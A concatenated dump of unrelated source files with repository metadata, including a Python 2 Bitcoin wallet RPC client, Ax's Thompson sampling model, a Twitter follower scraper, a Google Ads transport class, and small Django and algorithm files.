elif cmd == "listreceivedbyaccount":
try:
mc = raw_input("Minimum confirmations (optional): ")
incemp = raw_input("Include empty? (true/false, optional): ")
try:
print access.listreceivedbyaccount(mc, incemp)
except:
print access.listreceivedbyaccount()
except:
print "\n---An error occurred---\n"
elif cmd == "listreceivedbyaddress":
try:
mc = raw_input("Minimum confirmations (optional): ")
incemp = raw_input("Include empty? (true/false, optional): ")
try:
print access.listreceivedbyaddress(mc, incemp)
except:
print access.listreceivedbyaddress()
except:
print "\n---An error occurred---\n"
elif cmd == "listtransactions":
try:
acct = raw_input("Account (optional): ")
count = raw_input("Number of transactions (optional): ")
frm = raw_input("Skip (optional):")
try:
print access.listtransactions(acct, count, frm)
except:
print access.listtransactions()
except:
print "\n---An error occurred---\n"
elif cmd == "move":
try:
frm = raw_input("From: ")
to = raw_input("To: ")
amt = raw_input("Amount:")
mc = raw_input("Minimum confirmations (optional): ")
comment = raw_input("Comment (optional): ")
try:
print access.move(frm, to, amt, mc, comment)
except:
print access.move(frm, to, amt)
except:
print "\n---An error occurred---\n"
elif cmd == "sendfrom":
try:
frm = raw_input("From: ")
to = raw_input("To: ")
amt = raw_input("Amount:")
mc = raw_input("Minimum confirmations (optional): ")
comment = raw_input("Comment (optional): ")
commentto = raw_input("Comment-to (optional): ")
try:
print access.sendfrom(frm, to, amt, mc, comment, commentto)
except:
print access.sendfrom(frm, to, amt)
except:
print "\n---An error occurred---\n"
elif cmd == "sendmany":
try:
frm = raw_input("From: ")
to = raw_input("To (in format address1:amount1,address2:amount2,...): ")
mc = raw_input("Minimum confirmations (optional): ")
comment = raw_input("Comment (optional): ")
try:
print access.sendmany(frm,to,mc,comment)
except:
print access.sendmany(frm,to)
except:
print "\n---An error occurred---\n"
elif cmd == "sendtoaddress":
try:
to = raw_input("To (in format address1:amount1,address2:amount2,...): ")
amt = raw_input("Amount:")
comment = raw_input("Comment (optional): ")
commentto = raw_input("Comment-to (optional): ")
try:
print access.sendtoaddress(to,amt,comment,commentto)
except:
print access.sendtoaddress(to,amt)
except:
print "\n---An error occurred---\n"
elif cmd == "setaccount":
try:
addr = raw_input("Address: ")
acct = raw_input("Account:")
print access.setaccount(addr,acct)
except:
print "\n---An error occurred---\n"
elif cmd == "setgenerate":
try:
gen= raw_input("Generate? (true/false): ")
cpus = raw_input("Max processors/cores (-1 for unlimited, optional):")
try:
print access.setgenerate(gen, cpus)
except:
print access.setgenerate(gen)
except:
print "\n---An error occurred---\n"
elif cmd == "settxfee":
try:
amt = raw_input("Amount:")
print access.settxfee(amt)
except:
print "\n---An error occurred---\n"
elif cmd == "stop":
try:
print access.stop()
except:
print "\n---An error occurred---\n"
elif cmd == "validateaddress":
try:
addr = raw_input("Address: ")
print access.validateaddress(addr)
except:
print "\n---An error occurred---\n"
elif cmd == "walletpassphrase":
try:
pwd = getpass.getpass(prompt="Enter wallet passphrase: ")
access.walletpassphrase(pwd, 60)
print "\n---Wallet unlocked---\n"
except:
print "\n---An error occurred---\n"
elif cmd == "walletpassphrasechange":
try:
pwd = getpass.getpass(prompt="Enter old wallet passphrase: ")
pwd2 = getpass.getpass(prompt="Enter new wallet passphrase: ")
access.walletpassphrasechange(pwd, pwd2)
print
print "\n---Passphrase changed---\n"
except:
print
print "\n---An error occurred---\n"
print
else:
print "Command not found or not supported"
| [
"sebgruby@gmail.com"
] | sebgruby@gmail.com |
61076af3e80c5fb17be8652e0ee606478ab8a072 | 8d29d0e5e51422ecddeec20a36c96e5359dfec47 | /ax/models/discrete/thompson.py | a7cf1aabc4239cca842adf7b076b943745f0996d | [
"MIT"
] | permissive | AdrianaMusic/Ax | e5bd0bd72743a000203dee4a47ac2cdec6e16115 | 6e7470423cf9b9c8e83239d689455f5b15b62b7d | refs/heads/master | 2023-03-27T16:32:58.644860 | 2021-03-29T15:38:53 | 2021-03-29T15:40:18 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,674 | py | #!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import hashlib
import json
from typing import Dict, List, Optional, Tuple
import numpy as np
from ax.core.types import TConfig, TGenMetadata, TParamValue, TParamValueList
from ax.exceptions.constants import TS_MIN_WEIGHT_ERROR, TS_NO_FEASIBLE_ARMS_ERROR
from ax.exceptions.model import ModelError
from ax.models.discrete_base import DiscreteModel
from ax.utils.common.docutils import copy_doc
class ThompsonSampler(DiscreteModel):
"""Generator for Thompson sampling.
The generator performs Thompson sampling on the data passed in via `fit`.
Arms are given weight proportional to the probability that they are
winners, according to Monte Carlo simulations.
"""
def __init__(
self,
num_samples: int = 10000,
min_weight: Optional[float] = None,
uniform_weights: bool = False,
) -> None:
"""
Args:
num_samples: The number of samples to draw from the posterior.
min_weight: The minimum weight a arm must be
given in order for it to be returned from the gernerator. If not
specified, will be set to 2 / (number of arms).
uniform_weights: If True, the arms returned from the
generator will each be given a weight of 1 / (number of arms).
"""
self.num_samples = num_samples
self.min_weight = min_weight
self.uniform_weights = uniform_weights
self.X = None
self.Ys = None
self.Yvars = None
self.X_to_Ys_and_Yvars = None
@copy_doc(DiscreteModel.fit)
def fit(
self,
Xs: List[List[TParamValueList]],
Ys: List[List[float]],
Yvars: List[List[float]],
parameter_values: List[TParamValueList],
outcome_names: List[str],
) -> None:
self.X = self._fit_X(Xs=Xs)
self.Ys, self.Yvars = self._fit_Ys_and_Yvars(
Ys=Ys, Yvars=Yvars, outcome_names=outcome_names
)
self.X_to_Ys_and_Yvars = self._fit_X_to_Ys_and_Yvars(
X=self.X, Ys=self.Ys, Yvars=self.Yvars
)
@copy_doc(DiscreteModel.gen)
def gen(
self,
n: int,
parameter_values: List[TParamValueList],
objective_weights: Optional[np.ndarray],
outcome_constraints: Optional[Tuple[np.ndarray, np.ndarray]] = None,
fixed_features: Optional[Dict[int, TParamValue]] = None,
pending_observations: Optional[List[List[TParamValueList]]] = None,
model_gen_options: Optional[TConfig] = None,
) -> Tuple[List[TParamValueList], List[float], TGenMetadata]:
if objective_weights is None:
raise ValueError("ThompsonSampler requires objective weights.")
arms = self.X
k = len(arms)
weights = self._generate_weights(
objective_weights=objective_weights, outcome_constraints=outcome_constraints
)
min_weight = self.min_weight if self.min_weight is not None else 2.0 / k
# Second entry is used for tie-breaking
weighted_arms = [
(weights[i], np.random.random(), arms[i])
for i in range(k)
# pyre-fixme[58]: `>` is not supported for operand types `float` and
# `Optional[float]`.
if weights[i] > min_weight
]
if len(weighted_arms) == 0:
raise ModelError(
TS_MIN_WEIGHT_ERROR.format(
min_weight=min_weight, max_weight=max(weights)
)
)
weighted_arms.sort(reverse=True)
top_weighted_arms = weighted_arms[:n] if n > 0 else weighted_arms
top_arms = [arm for _, _, arm in top_weighted_arms]
top_weights = [weight for weight, _, _ in top_weighted_arms]
if self.uniform_weights:
top_weights = [1 / len(top_arms) for _ in top_arms]
return top_arms, [x / sum(top_weights) for x in top_weights], {}
@copy_doc(DiscreteModel.predict)
def predict(self, X: List[TParamValueList]) -> Tuple[np.ndarray, np.ndarray]:
n = len(X) # number of parameterizations at which to make predictions
m = len(self.Ys) # number of outcomes
f = np.zeros((n, m)) # array of outcome predictions
cov = np.zeros((n, m, m)) # array of predictive covariances
predictX = [self._hash_TParamValueList(x) for x in X]
for i, X_to_Y_and_Yvar in enumerate(self.X_to_Ys_and_Yvars):
# iterate through outcomes
for j, x in enumerate(predictX):
# iterate through parameterizations at which to make predictions
if x not in X_to_Y_and_Yvar:
raise ValueError(
"ThompsonSampler does not support out-of-sample prediction."
)
f[j, i], cov[j, i, i] = X_to_Y_and_Yvar[x]
return f, cov
def _generate_weights(
self,
objective_weights: np.ndarray,
outcome_constraints: Optional[Tuple[np.ndarray, np.ndarray]] = None,
) -> List[float]:
samples, fraction_all_infeasible = self._produce_samples(
num_samples=self.num_samples,
objective_weights=objective_weights,
outcome_constraints=outcome_constraints,
)
if fraction_all_infeasible > 0.99:
raise ModelError(TS_NO_FEASIBLE_ARMS_ERROR)
num_valid_samples = samples.shape[1]
while num_valid_samples < self.num_samples:
num_additional_samples = (self.num_samples - num_valid_samples) / (
1 - fraction_all_infeasible
)
num_additional_samples = int(np.maximum(num_additional_samples, 100))
new_samples, _ = self._produce_samples(
num_samples=num_additional_samples,
objective_weights=objective_weights,
outcome_constraints=outcome_constraints,
)
samples = np.concatenate([samples, new_samples], axis=1)
num_valid_samples = samples.shape[1]
winner_indices = np.argmax(samples, axis=0) # (num_samples,)
winner_counts = np.zeros(len(self.X)) # (k,)
for index in winner_indices:
winner_counts[index] += 1
weights = winner_counts / winner_counts.sum()
return weights.tolist()
def _produce_samples(
self,
num_samples: int,
objective_weights: np.ndarray,
outcome_constraints: Optional[Tuple[np.ndarray, np.ndarray]],
) -> Tuple[np.ndarray, float]:
k = len(self.X)
samples_per_metric = np.zeros(
(k, num_samples, len(self.Ys))
) # k x num_samples x m
for i, Y in enumerate(self.Ys): # (k x 1)
Yvar = self.Yvars[i] # (k x 1)
cov = np.diag(Yvar) # (k x k)
samples = np.random.multivariate_normal(
Y, cov, num_samples
).T # (k x num_samples)
samples_per_metric[:, :, i] = samples
any_violation = np.zeros((k, num_samples), dtype=bool) # (k x num_samples)
if outcome_constraints:
# A is (num_constraints x m)
# b is (num_constraints x 1)
A, b = outcome_constraints
# (k x num_samples x m) dot (num_constraints x m)^T
# = (k x num_samples x m) dot (m x num_constraints)
# ==> (k x num_samples x num_constraints)
constraint_values = np.dot(samples_per_metric, A.T)
violations = constraint_values > b.T
any_violation = np.max(violations, axis=2) # (k x num_samples)
objective_values = np.dot(
samples_per_metric, objective_weights
) # (k x num_samples)
objective_values[any_violation] = -np.Inf
best_arm = objective_values.max(axis=0) # (num_samples,)
all_arms_infeasible = best_arm == -np.Inf # (num_samples,)
fraction_all_infeasible = all_arms_infeasible.mean()
filtered_objective = objective_values[:, ~all_arms_infeasible] # (k x ?)
return filtered_objective, fraction_all_infeasible
def _validate_Xs(self, Xs: List[List[TParamValueList]]) -> None:
"""
1. Require that all Xs have the same arms, i.e. we have observed
all arms for all metrics. If so, we can safely use Xs[0] exclusively.
2. Require that all rows of X are unique, i.e. only one observation
per parameterization.
"""
if not all(x == Xs[0] for x in Xs[1:]):
raise ValueError(
"ThompsonSampler requires that all elements of Xs are identical; "
"i.e. that we have observed all arms for all metrics."
)
X = Xs[0]
uniqueX = {self._hash_TParamValueList(x) for x in X}
if len(uniqueX) != len(X):
raise ValueError(
"ThompsonSampler requires all rows of X to be unique; "
"i.e. that there is only one observation per parameterization."
)
def _fit_X(self, Xs: List[List[TParamValueList]]) -> List[TParamValueList]:
"""After validation has been performed, it's safe to use Xs[0]."""
self._validate_Xs(Xs=Xs)
return Xs[0]
def _fit_Ys_and_Yvars(
self, Ys: List[List[float]], Yvars: List[List[float]], outcome_names: List[str]
) -> Tuple[List[List[float]], List[List[float]]]:
"""For plain Thompson Sampling, there's nothing to be done here.
EmpiricalBayesThompsonSampler will overwrite this method to perform
shrinkage.
"""
return Ys, Yvars
def _fit_X_to_Ys_and_Yvars(
self, X: List[TParamValueList], Ys: List[List[float]], Yvars: List[List[float]]
) -> List[Dict[TParamValueList, Tuple[float, float]]]:
"""Construct lists of mappings, one per outcome, of parameterizations
to the a tuple of their mean and variance.
"""
X_to_Ys_and_Yvars = []
hashableX = [self._hash_TParamValueList(x) for x in X]
for (Y, Yvar) in zip(Ys, Yvars):
X_to_Ys_and_Yvars.append(dict(zip(hashableX, zip(Y, Yvar))))
return X_to_Ys_and_Yvars
def _hash_TParamValueList(self, x: TParamValueList) -> str:
"""Hash a list of parameter values. This is safer than converting the
list to a tuple because of int/floats.
"""
param_values_str = json.dumps(x)
return hashlib.md5(param_values_str.encode("utf-8")).hexdigest()
| [
"facebook-github-bot@users.noreply.github.com"
] | facebook-github-bot@users.noreply.github.com |
fcb28620711e0de02486fea670581b9b5545cc98 | 3d19e1a316de4d6d96471c64332fff7acfaf1308 | /Users/L/LisaTalia/jensonbutton_twitter_followers_2.py | bf8959f7d0ada25a0ceeb119eca07c6ab3c8838c | [] | no_license | BerilBBJ/scraperwiki-scraper-vault | 4e98837ac3b1cc3a3edb01b8954ed00f341c8fcc | 65ea6a943cc348a9caf3782b900b36446f7e137d | refs/heads/master | 2021-12-02T23:55:58.481210 | 2013-09-30T17:02:59 | 2013-09-30T17:02:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,246 | py | import scraperwiki
import simplejson
import urllib2
import sys
# Needs to be in lower case
SCREENNAME = 'iCod'
# API help: https://dev.twitter.com/docs/api/1/get/followers/ids
url = 'http://api.twitter.com/1/followers/ids.json?screen_name=%s' % (urllib2.quote(SCREENNAME))
print url
followers_json = simplejson.loads(scraperwiki.scrape(url))
# print "Found %d followers of %s" % (len(followers_json), SCREENNAME)
followers_json = followers_json['ids'] # get earliest followers first for batching
followers_json.reverse()
# Groups a list in chunks of a given size
def group(lst, n):
for i in range(0, len(lst), n):
val = lst[i:i+n]
if len(val) == n:
yield tuple(val)
# Where to start? Overlap one batch to increase hit rate if people unfollow etc.
batchdone = scraperwiki.sqlite.get_var('batchdone', 1)
batchstart = batchdone - 1
if batchstart < 1:
batchstart = 1
# Take 100 at a time, and do one lookup call for each batch
c = 0
for follower_list in group(followers_json, 100):
c = c + 1
if c < batchstart:
continue
# print "number", c, "out of", len(followers_json) / 100
# print 'batch of ids:', follower_list
url = 'http://api.twitter.com/1/users/lookup.json?user_id=%s' % (urllib2.quote(','.join(map(str, follower_list))))
# print 'getting url:', url
details_json = simplejson.loads(scraperwiki.scrape(url))
for detail in details_json:
data = {'screen_name': detail['screen_name'],
'id': detail['id'],'location': detail['location'],
'bio': detail['description'],
'followers_count': detail['followers_count'],
'friends_count': detail['friends_count'],
'statuses_count': detail['statuses_count'],
'listed_count': detail['listed_count'],
'url': detail['url'],
'verified': detail['verified'],
'time_zone': detail['time_zone']}
# print "Found person", data
scraperwiki.sqlite.save(unique_keys=['id'], data = data)
scraperwiki.sqlite.save_var('batchdone', c)
import scraperwiki
import simplejson
import urllib2
import sys
# Needs to be in lower case
SCREENNAME = 'iCod'
# API help: https://dev.twitter.com/docs/api/1/get/followers/ids
url = 'http://api.twitter.com/1/followers/ids.json?screen_name=%s' % (urllib2.quote(SCREENNAME))
print url
followers_json = simplejson.loads(scraperwiki.scrape(url))
# print "Found %d followers of %s" % (len(followers_json), SCREENNAME)
followers_json = followers_json['ids'] # get earliest followers first for batching
followers_json.reverse()
# Groups a list in chunks of a given size
def group(lst, n):
for i in range(0, len(lst), n):
val = lst[i:i+n]
if len(val) == n:
yield tuple(val)
# Where to start? Overlap one batch to increase hit rate if people unfollow etc.
batchdone = scraperwiki.sqlite.get_var('batchdone', 1)
batchstart = batchdone - 1
if batchstart < 1:
batchstart = 1
# Take 100 at a time, and do one lookup call for each batch
c = 0
for follower_list in group(followers_json, 100):
c = c + 1
if c < batchstart:
continue
# print "number", c, "out of", len(followers_json) / 100
# print 'batch of ids:', follower_list
url = 'http://api.twitter.com/1/users/lookup.json?user_id=%s' % (urllib2.quote(','.join(map(str, follower_list))))
# print 'getting url:', url
details_json = simplejson.loads(scraperwiki.scrape(url))
for detail in details_json:
data = {'screen_name': detail['screen_name'],
'id': detail['id'],'location': detail['location'],
'bio': detail['description'],
'followers_count': detail['followers_count'],
'friends_count': detail['friends_count'],
'statuses_count': detail['statuses_count'],
'listed_count': detail['listed_count'],
'url': detail['url'],
'verified': detail['verified'],
'time_zone': detail['time_zone']}
# print "Found person", data
scraperwiki.sqlite.save(unique_keys=['id'], data = data)
scraperwiki.sqlite.save_var('batchdone', c)
| [
"pallih@kaninka.net"
] | pallih@kaninka.net |
b019fb5ae46827e1a3740f5c118317c74fa8262c | 9ae6ce54bf9a2a86201961fdbd5e7b0ec913ff56 | /google/ads/googleads/v9/services/services/account_budget_proposal_service/transports/base.py | f1aa4845ec900732bfa03bdd6987bbf629ad7d73 | [
"Apache-2.0"
] | permissive | GerhardusM/google-ads-python | 73b275a06e5401e6b951a6cd99af98c247e34aa3 | 676ac5fcb5bec0d9b5897f4c950049dac5647555 | refs/heads/master | 2022-07-06T19:05:50.932553 | 2022-06-17T20:41:17 | 2022-06-17T20:41:17 | 207,535,443 | 0 | 0 | Apache-2.0 | 2019-09-10T10:58:55 | 2019-09-10T10:58:55 | null | UTF-8 | Python | false | false | 4,520 | py | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import abc
import typing
import pkg_resources
import google.auth # type: ignore
from google.api_core import gapic_v1
from google.auth import credentials as ga_credentials # type: ignore
from google.ads.googleads.v9.resources.types import account_budget_proposal
from google.ads.googleads.v9.services.types import (
account_budget_proposal_service,
)
try:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo(
gapic_version=pkg_resources.get_distribution("google-ads",).version,
)
except pkg_resources.DistributionNotFound:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo()
class AccountBudgetProposalServiceTransport(metaclass=abc.ABCMeta):
"""Abstract transport class for AccountBudgetProposalService."""
AUTH_SCOPES = ("https://www.googleapis.com/auth/adwords",)
def __init__(
self,
*,
host: str = "googleads.googleapis.com",
credentials: ga_credentials.Credentials = None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
) -> None:
"""Instantiate the transport.
Args:
host (Optional[str]):
The hostname to connect to.
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
"""
# Save the hostname. Default to port 443 (HTTPS) if none is specified.
if ":" not in host:
host += ":443"
self._host = host
# If no credentials are provided, then determine the appropriate
# defaults.
if credentials is None:
credentials, _ = google.auth.default(scopes=self.AUTH_SCOPES)
# Save the credentials.
self._credentials = credentials
# Lifted into its own function so it can be stubbed out during tests.
self._prep_wrapped_messages(client_info)
def _prep_wrapped_messages(self, client_info):
# Precomputed wrapped methods
self._wrapped_methods = {
self.get_account_budget_proposal: gapic_v1.method.wrap_method(
self.get_account_budget_proposal,
default_timeout=None,
client_info=client_info,
),
self.mutate_account_budget_proposal: gapic_v1.method.wrap_method(
self.mutate_account_budget_proposal,
default_timeout=None,
client_info=client_info,
),
}
def close(self):
"""Closes resources associated with the transport.
.. warning::
Only call this method if the transport is NOT shared
with other clients - this may cause errors in other clients!
"""
raise NotImplementedError()
@property
def get_account_budget_proposal(
self,
) -> typing.Callable[
[account_budget_proposal_service.GetAccountBudgetProposalRequest],
account_budget_proposal.AccountBudgetProposal,
]:
raise NotImplementedError
@property
def mutate_account_budget_proposal(
self,
) -> typing.Callable[
[account_budget_proposal_service.MutateAccountBudgetProposalRequest],
account_budget_proposal_service.MutateAccountBudgetProposalResponse,
]:
raise NotImplementedError
__all__ = ("AccountBudgetProposalServiceTransport",)
| [
"noreply@github.com"
] | GerhardusM.noreply@github.com |
f1caa1d51454453d66b6f77be2fd0f473f85a711 | 9d1ef7993bf0df9967b1e7a79d5913fbc3e3a7e1 | /util.py | 685621eda555f1de7649a2fbe36382c343b6b420 | [
"BSD-2-Clause"
] | permissive | mitmedialab/WhatWeWatch-Analysis | f6f4fbd8fba4ef6a58f4961c7f3d9b9519dae3a4 | cc01dee4e77155c8aec7638e4275172053db3247 | refs/heads/master | 2021-05-28T05:40:36.678808 | 2014-11-03T01:22:26 | 2014-11-03T01:22:26 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,798 | py | import csv
import datetime
import json
import math
import os
import random
import numpy as np
dirname = os.path.dirname(os.path.realpath(__file__))
with open(os.path.join(dirname, 'country_info.json'), 'rb') as f:
country_list = json.loads(f.read())
country_info = dict()
for country in country_list:
alpha3 = country['alpha-3'].lower()
country_info[alpha3] = {
'name': country['name']
, 'alpha3': alpha3
}
def country_name(alpha3):
return country_info[alpha3]['name']
def write_results_csv(experiment, run, filename, data, headers):
create_result_dir(experiment, run)
path = 'results/%s/%s/%s.csv' % (experiment, run, filename)
with open(path, 'wb') as f:
f.write(','.join(headers))
f.write("\n")
for row in data:
f.write(','.join([str(x) for x in row]))
f.write("\n")
def create_result_dir(experiment, run):
try:
os.stat('results')
except OSError:
os.mkdir('results')
try:
os.stat('results/%s' % experiment)
except OSError:
os.mkdir('results/%s' % experiment)
try:
os.stat('results/%s/%s' % (experiment, run))
except OSError:
os.mkdir('results/%s/%s' % (experiment, run))
class VideoData(object):
@classmethod
def from_csv(cls, filename, filter_single=False):
# Read data file
with open(filename, 'rb') as f:
reader = csv.reader(f)
# Skip header and read rows
reader.next()
rows = []
for row in reader:
date = row[0].strip()
loc = row[1].strip().lower()
vid_id = row[2].strip()
rows.append((date, loc, vid_id))
return VideoData(rows, filter_single=filter_single)
def __init__(self, rows, proto=None, filter_single=False):
'''Load data from a csv and create useful representations'''
# Load basic data
if proto is None:
self.countries = set()
self.videos = set()
self.dates = set()
self.pairs = list()
self.dates_vid_cid = {}
self.vids_by_cid = {}
self.rows_by_date = {}
self.cids_by_vid = {}
else:
self.countries = proto.countries
self.videos = proto.videos
self.dates = set()
self.pairs = list()
self.dates_vid_cid = {}
self.vids_by_cid = {}
self.rows_by_date = {}
self.cids_by_vid = {}
# Process rows
for row in rows:
date = row[0]
loc = row[1]
vid_id = row[2]
if proto is None:
self.countries.add(loc)
self.videos.add(vid_id)
self.rows_by_date[date] = self.rows_by_date.get(date,[]) + [(date, loc, vid_id)]
self.dates.add(date)
self.pairs.append((loc, vid_id))
self.vids_by_cid[loc] = self.vids_by_cid.get(loc, set()).union(set([vid_id]))
self.cids_by_vid[vid_id] = self.cids_by_vid.get(vid_id, set()).union(set([loc]))
# Store video dates by location by video id
self.dates_vid_cid[vid_id] = self.dates_vid_cid.get(vid_id, dict())
self.dates_vid_cid[vid_id][loc] = self.dates_vid_cid[vid_id].get(loc, list())
y,m,d = date.split('-')
self.dates_vid_cid[vid_id][loc].append(datetime.date(int(y), int(m), int(d)))
exclude = set()
if proto is None and filter_single:
for vid, cids in self.cids_by_vid.iteritems():
if len(cids) < 2:
exclude.add(vid)
self.videos = [x for x in self.videos if not x in exclude]
# Country and video lookups
if proto is None:
self.country_lookup = Lookup(sorted(self.countries))
self.video_lookup = Lookup(sorted(self.videos))
else:
self.country_lookup = proto.country_lookup
self.video_lookup = proto.video_lookup
# Calculate counts
num_countries = len(self.countries)
num_videos = len(self.videos)
print 'Creating data with %d countries and %d videos' % (num_countries, num_videos)
counts = np.zeros((num_countries, num_videos))
for loc, vid_id in self.pairs:
try:
vid_index = self.video_lookup.get_id(vid_id)
loc_index = self.country_lookup.get_id(loc)
counts[loc_index][vid_index] += 1
except KeyError:
pass
self.counts = counts
def cross_validation_sets(self, num_folds=10):
'''Return a list of (training, test) pairs from this data set.'''
dates = self.rows_by_date.keys()
random.shuffle(dates)
per_fold = int(math.floor(len(dates) / num_folds))
folds = []
for k in range(num_folds):
fold = []
for i in range(per_fold):
date_rows = self.rows_by_date[dates.pop()]
for row in date_rows:
if row[2] in self.videos:
fold.append(row)
folds.append(fold)
cv = CrossValidation()
for k in range(num_folds):
training = sum(folds[:k] + folds[k+1:], [])
test = folds[k]
cv.add_fold(training, test)
return cv
def rows_to_counts(self, rows):
counts = np.zeros(self.counts.shape)
for date, loc, vid_id in rows:
v = self.video_lookup.tok2id[vid_id]
c = self.country_lookup.tok2id[loc]
counts[c,v] += 1
return counts
class CrossValidation(object):
def __init__(self):
self.folds = []
def add_fold(self, training, test):
self.folds.append((training, test))
def get_fold_training(self, i):
return self.folds[i][0]
def get_fold_test(self, i):
return self.folds[i][1]
def __len__(self):
return len(self.folds)
class Lookup(object):
def __init__(self, tokens):
'''Create a two-way lookup between tokens and unique integer ids.'''
self.tok2id = dict()
self.id2tok = dict()
next_id = 0
for t in tokens:
if not t in self.tok2id:
self.tok2id[t] = next_id
self.id2tok[next_id] = t
next_id += 1
def get_token(self, id):
'''Get a named token from an integer id.'''
return self.id2tok[id]
def get_id(self, tok):
'''Get an integer id for the named token.'''
return self.tok2id[tok]
def __len__(self):
return len(self.id2tok)
| [
"ed@elplatt.com"
] | ed@elplatt.com |
1652ad9daf15db0ca2e2d44b9f59139dd7a652db | 4142b8c513d87361da196631f7edd82f11465abb | /python/630/630I.py | 6cde5d177d6668156063078b87be1d83a647c71e | [] | no_license | npkhanhh/codeforces | b52b66780426682ea1a3d72c66aedbe6dc71d7fe | 107acd623b0e99ef0a635dfce3e87041347e36df | refs/heads/master | 2022-02-08T17:01:01.731524 | 2022-02-07T10:29:52 | 2022-02-07T10:29:52 | 228,027,631 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 169 | py | import math
n = int(input())
space = 2 * n - 2
rs = space - n
res = 2 * 4 * 3 * pow(4, rs - 1)
if n > 3:
res += 3 * 4 * 3 * pow(4, rs - 2) * (rs - 1)
print(res)
| [
"npkhanh93@gmail.com"
] | npkhanh93@gmail.com |
fff590cd8a782b6dfd6b9e833ebce514704de1a4 | a0dbc48f31cf3fbddd3cc7672cf3db415cb391c4 | /compiler/drc/__init__.py | 40e3a45cdbd01353b65a987887e550f8c1438711 | [
"BSD-3-Clause"
] | permissive | wangyaobsz/OpenRAM | 4178ef93816b233bac0aaecc580e2cbd235ac39d | 0d616ae072e6c42a0d8a006eebc681408502e956 | refs/heads/master | 2022-08-23T07:51:39.745708 | 2022-07-21T16:37:24 | 2022-07-21T16:37:24 | 113,813,373 | 1 | 0 | null | 2017-12-11T04:47:53 | 2017-12-11T04:47:52 | null | UTF-8 | Python | false | false | 180 | py | from .custom_cell_properties import *
from .custom_layer_properties import *
from .design_rules import *
from .module_type import *
from .drc_lut import *
from .drc_value import *
| [
"mrg@ucsc.edu"
] | mrg@ucsc.edu |
05367742808db1ee40d5e26a98bd238f59c9e1c5 | 9ac405635f3ac9332e02d0c7803df757417b7fee | /geografia/apps.py | cf5d22eb8e0f1db20c056602cfb45571fd5e655b | [] | no_license | odecsarrollo/07_intranet_proyectos | 80af5de8da5faeb40807dd7df3a4f55f432ff4c0 | 524aeebb140bda9b1bf7a09b60e54a02f56fec9f | refs/heads/master | 2023-01-08T04:59:57.617626 | 2020-09-25T18:01:09 | 2020-09-25T18:01:09 | 187,250,667 | 0 | 0 | null | 2022-12-30T09:36:37 | 2019-05-17T16:41:35 | JavaScript | UTF-8 | Python | false | false | 93 | py | from django.apps import AppConfig
class GeografiaConfig(AppConfig):
name = 'geografia'
| [
"fabio.garcia.sanchez@gmail.com"
] | fabio.garcia.sanchez@gmail.com |
e638a1bce25a680fb36e833c918588d159a522d5 | 32809f6f425bf5665fc19de2bc929bacc3eeb469 | /src/1039-Minimum-Score-Triangulation-of-Polygon/1039.py | f87bf6ee51d479a31c606ff6a795632caf3e38a6 | [] | no_license | luliyucoordinate/Leetcode | 9f6bf01f79aa680e2dff11e73e4d10993467f113 | bcc04d49969654cb44f79218a7ef2fd5c1e5449a | refs/heads/master | 2023-05-25T04:58:45.046772 | 2023-05-24T11:57:20 | 2023-05-24T11:57:20 | 132,753,892 | 1,575 | 569 | null | 2023-05-24T11:57:22 | 2018-05-09T12:30:59 | C++ | UTF-8 | Python | false | false | 350 | py | class Solution:
def minScoreTriangulation(self, A: List[int]) -> int:
n = len(A)
dp = [[0] * n for i in range(n)]
for d in range(2, n):
for i in range(n - d):
j = i + d
dp[i][j] = min(dp[i][k] + dp[k][j] + A[i] * A[j] * A[k] for k in range(i + 1, j))
return dp[0][n - 1] | [
"luliyucoordinate@outlook.com"
] | luliyucoordinate@outlook.com |
443f9c31e65875c862b8d0538956fdb4badc4e8f | 313e29c735deecfe75ae603ff774f32a6574d159 | /home/migrations/0002_load_initial_data.py | eb9af5fcf0569de1f1b3fad3aab461a66bef3afb | [] | no_license | crowdbotics-apps/web-24-dev-3400 | 15513166c4316512671bb25ce7c048a2b8322b86 | 702f7cd25e31447f87d12625dcc86eb8a5bfd865 | refs/heads/master | 2023-05-30T19:28:40.871181 | 2020-04-24T13:46:18 | 2020-04-24T13:46:18 | 258,422,254 | 0 | 0 | null | 2021-06-12T18:05:52 | 2020-04-24T06:09:54 | Python | UTF-8 | Python | false | false | 1,281 | py | from django.db import migrations
def create_customtext(apps, schema_editor):
CustomText = apps.get_model("home", "CustomText")
customtext_title = "web 24"
CustomText.objects.create(title=customtext_title)
def create_homepage(apps, schema_editor):
HomePage = apps.get_model("home", "HomePage")
homepage_body = """
<h1 class="display-4 text-center">web 24</h1>
<p class="lead">
This is the sample application created and deployed from the Crowdbotics app.
You can view list of packages selected for this application below.
</p>"""
HomePage.objects.create(body=homepage_body)
def create_site(apps, schema_editor):
Site = apps.get_model("sites", "Site")
custom_domain = "web-24-dev-3400.botics.co"
site_params = {
"name": "web 24",
}
if custom_domain:
site_params["domain"] = custom_domain
Site.objects.update_or_create(defaults=site_params, id=1)
class Migration(migrations.Migration):
dependencies = [
("home", "0001_initial"),
("sites", "0002_alter_domain_unique"),
]
operations = [
migrations.RunPython(create_customtext),
migrations.RunPython(create_homepage),
migrations.RunPython(create_site),
]
| [
"team@crowdbotics.com"
] | team@crowdbotics.com |
